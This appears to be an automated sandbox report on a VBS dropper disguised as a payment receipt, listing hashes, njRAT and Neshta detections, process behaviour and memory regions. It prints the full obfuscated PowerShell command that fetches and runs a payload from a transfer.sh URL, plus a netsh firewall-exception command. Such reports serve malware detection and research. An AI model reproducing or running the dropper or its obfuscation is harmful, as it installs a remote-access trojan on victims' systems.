Analysis

  • max time kernel
    151s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    05-01-2022 08:22

General

  • Target

    7H2B1N27_PAYMENT_RECEIPT.vbs

  • Size

    2KB

  • MD5

    1cf9e3a75322042644a95e4d9eb359bc

  • SHA1

    27469cadb09a071e5ee98e6a6492bf1ee16bd170

  • SHA256

    7ad872e2d279268cc3107a90337b4beb3be0fc888668d60e6995d64b8955b2e6

  • SHA512

    a97d371a84e9ec64821022d64439ac6b04befe0fc2b4231b721450cbc12d70cc3232a53df936a4158e8c5e380c66ef6d1dff66aff4c0b5909652b3dc4f7a41ad

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
ps1.dropper

https://transfer.sh/get/BKC469/HHHHHHHHHHHHHHHH.txt

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Attributes
reg_key
Microsoft.Exe

Signatures 15

  • Detect Neshta Payload ⋅ 3 IoCs
  • Modifies system executable filetype association ⋅ 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request ⋅ 1 IoCs
  • Modifies Windows Firewall ⋅ 1 TTPs
  • Adds Run key to start application ⋅ 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext ⋅ 2 IoCs
  • Drops file in Program Files directory ⋅ 53 IoCs
  • Drops file in Windows directory ⋅ 1 IoCs
  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class ⋅ 1 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 3 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 12 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 24 IoCs

Processes 5

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7H2B1N27_PAYMENT_RECEIPT.vbs"
    Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &((gv '*MDR*').naMe[3,11,2]-joIN'') ( (('(0PG (Rd9&(Lz0PG+0PGS{0'+'PG+0PG0}Rd9+Rd0PG+0'+'PG9{1}LzRd0PG+0PG9+Rd0PG+0PG9S0PG+0PG-fRd9+Rd9X'+'EzIR0PG+0PGd0PG+0PG9'+'+R0PG+0PGd9EXEz,XEzR'+'d9'+'+Rd9XXEz)(.R0PG+0PGd0PG+0PG9+Rd9(0PG+0PGLRd9+Rd9z0PG+0PGS{10PG+0PG}{0}R0PG+0PGd9+R0PG+0PGd90PG+0PG{20PG+0PG}LzS -R0PG+0PGd90PG+0PG+Rd90PG+0PGfXERd0PG+0PG90PG+0PG+Rd0PG'+'+0PG9zORd9+Rd9bXEz,(LR0PG+0PGd0PG+0PG9+Rd90PG+0PGzS{1}0PG+0PGRd90PG+0PG+0PG+0PGR0PG+0PGd9{0Rd9+Rd9}LzS 0PG+0PG-f'+'Rd9+Rd9 0PG+0PGRd9+Rd90PG+0PGXEz0PG+0PGw-Rd9+0P'+'G+0PGRd9XEz,XE0PG+0PGz0PG+0PGRd0'+'PG+0PG9+R'+'d9N0PG+0PGeXEz)Rd9+Rd90PG+0PG,(0PG+0PGLz0PG+0PGS{0}{1R0PG+0PGd0PG+0PG9+Rd9}Rd9+Rd90PG+0PGLz0PG+0PGS-Rd9+Rd0PG+0PG9fXEz0PG+0PGjeXE0PG+0PGz0PG+0PG,XEzRd0PG+0PG9+Rd0PG+0PG9ctX0PG+0PGEz)) (LzS{2Rd90PG+0PG+R0PG+0PGd90PG'+'+0PG}{0}0PG+0PG{'+'0PG+0PG1Rd9+Rd9}LzSRd9+0PG+0PGRd0PG+0PG9-fRd9+Rd9 R'+'d90PG+0PG+Rd9(Lz0PG+0PGRd9+Rd0PG+0PG9S{1}{0}{0PG+0PG2Rd0PG+0PG90PG+0PG+R0PG+0PGd9}Rd9+Rd9LzS 0PG+0PG-f Rd9+Rd9XRd9+Rd9EzbCl0PG+0PGXEz,XEz.W0PG+0PGe0PG+0PGXR'+'d'+'9+Rd9ERd90PG+0PG+R0PG+0PGd90PG+0PGz,XEz0PG+0PGiX0PG+0PGEz)0PG+0PG,R0PG+0PGd9+Rd9XERd9+R0PG+0PGd9ze0PG+0PGntXEz,X0PG+0PGR0PG+0PGd9+R0PG+0PGd9EzNetXEz'+')).0PG+0PG(L0PG+0PGRd9+Rd9zRd90P'+'G+0PG+Rd90PG+0P'+'GS{Rd0PG+0PG90PG+0PG+Rd0PG+0PG90}{2Rd9+0PG'+'+0PGRd'+'9}0PG+0PG{3}{0PG+0PG1}{40PG+0PG}LRd90PG+0PG+Rd9zSRd9+Rd9 0PG+0PG-f XE0PG+0PGzDXERd9+Rd9z,Rd9+R0PG+0PGd9XEzdstXEz'+',XE0PG+0PGzow0PG+0PGnXERd'+'9+R0PG+0PGd9z,R0PG+0PGd9+0PG+0PGR0PG+0PGd90PG+0PGXEzloaXER0PG+0PGd90P'+'G'+'+0PG+Rd90PG+0PGz,(LRd0PG+0PG9+0P'+'G+0PGRd9z0PG+0PGRd9+Rd9S0PG+0PG{0}{1}LzRd9+Rd0PG+0PG9S -Rd9+0PG+0PGRd9fRd0PG'+'+0PG9+R'+'d9XEzrRd9'+'+R0PG+0PGd9iXEz,0PG+0PGX0'+'PG+0PGEzn0PG+0PGgXEz0PG+0PGRd9+Rd90'+'PG+0PG)).LRd9+Rd9'+'zSINRd9+Rd0PG+0PG9vOLGykERd9+Rd9'+'LzS(0PG+0'+'PGXEzhttps://transfer.sh/get/BKC469/HHHHHHHHHHHHHHHH.txtX0PG+0PGRd9+Rd9Ez)Rd0PG+0PG90PG+0PG).rEp'+'l0PG+0P'+'GacE(Rd9LGyRd9'+',0PG+0PGR0PG+0PGd9tYaRd0PG+0PG9).rEplacE(([cHaR]76+0PG+0PG[cHaR]122+[0PG+0PGcHaR0PG+0PG]0PG+0PG83),[STrinG]0PG+0PG[0PG+0PGc'+'HaR]34)0PG+0PG.rEplacE(([cHaR]80PG+0PG8+[cHaR]60PG+0PG9+[cHaR]120PG+0PG2),[0PG+0PGSTr'+'inG][cHa0PG+0PGR]30PG+0PG9)0c0PG'+'+0PGoIn0PG+0PGVo0PG+0PGkE-E0PG+0PGxpre'+'sSi0PG+0PGo0PG+0PGN0PG).rEplaCe(0PGRd90PG,[sTrIng][CHar]39).rEplaCe(0PG0co0PG,0PGvKO0PG).rEplaCe(([CHar'+']116+[CHar]89+[CHar]97),[sTrIng][CHar]96)vKO .( kSfEnV:COmspeC[4,24,25]-jOIN0'+'PG0PG)') -replace ([CHaR]118+[CHaR]75+[CHaR]79),[CHaR]124-crEpLace([CHaR]48+[CHaR]80+[CHaR]71),[CHaR]39 -replace 'kSf',[CHaR]36))
      Blocklisted process makes network request
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Modifies system executable filetype association
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        PID:1324
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:1044
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
          PID:4040

Network

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Defense Evasion

        Execution

          Exfiltration

            Impact

              Initial Access

                Lateral Movement

                  Privilege Escalation

                    Replay Monitor

                    00:00 00:00

                    Downloads

                    • C:\Users\ALLUSE~1\Genetor\MICROS~1.EXE
                      MD5

                      1e98e92a982af948ee18ee819a2d8ad1

                      SHA1

                      6cb0bd87815118351e5e32c50b434079dfba255c

                      SHA256

                      235d3f96a78ce2dad584e6eb1a25fc386b3ae5e332c4d3c56f03b0a4978be778

                      SHA512

                      6711de2e00462c49852cee03fd8ef720310c4ffa5b3a653c08f2913a6146974f28b8a3b3ff38b3097310852a5aa3b964b77945bcefef3856911eb9acd0e42c6f

                    • memory/1044-157-0x00000000050E0000-0x000000000517C000-memory.dmp
                    • memory/1044-163-0x0000000005C60000-0x0000000005C6A000-memory.dmp
                    • memory/1044-161-0x0000000005180000-0x000000000567E000-memory.dmp
                    • memory/1044-159-0x0000000005580000-0x0000000005612000-memory.dmp
                    • memory/1044-158-0x0000000005680000-0x0000000005B7E000-memory.dmp
                    • memory/1044-156-0x0000000000400000-0x0000000000410000-memory.dmp
                    • memory/1044-155-0x0000000000400000-0x0000000000410000-memory.dmp
                    • memory/1044-152-0x000000000040BBCE-mapping.dmp
                    • memory/1044-151-0x0000000000400000-0x0000000000410000-memory.dmp
                    • memory/1324-148-0x0000000000400000-0x000000000041B000-memory.dmp
                    • memory/1324-154-0x0000000000400000-0x000000000041B000-memory.dmp
                    • memory/1324-149-0x00000000004080E4-mapping.dmp
                    • memory/2824-136-0x000001F2442A6000-0x000001F2442A8000-memory.dmp
                    • memory/2824-153-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-135-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-115-0x0000000000000000-mapping.dmp
                    • memory/2824-137-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-147-0x000001F25CAF0000-0x000001F25CB02000-memory.dmp
                    • memory/2824-131-0x000001F2442A0000-0x000001F2442A2000-memory.dmp
                    • memory/2824-127-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-150-0x000001F25CB00000-0x000001F25CB12000-memory.dmp
                    • memory/2824-126-0x000001F25CB10000-0x000001F25CB86000-memory.dmp
                    • memory/2824-125-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-132-0x000001F2442A3000-0x000001F2442A5000-memory.dmp
                    • memory/2824-124-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-123-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-122-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-121-0x000001F25C960000-0x000001F25C982000-memory.dmp
                    • memory/2824-120-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-119-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-117-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-118-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/2824-116-0x000001F244210000-0x000001F244212000-memory.dmp
                    • memory/4040-160-0x0000000000000000-mapping.dmp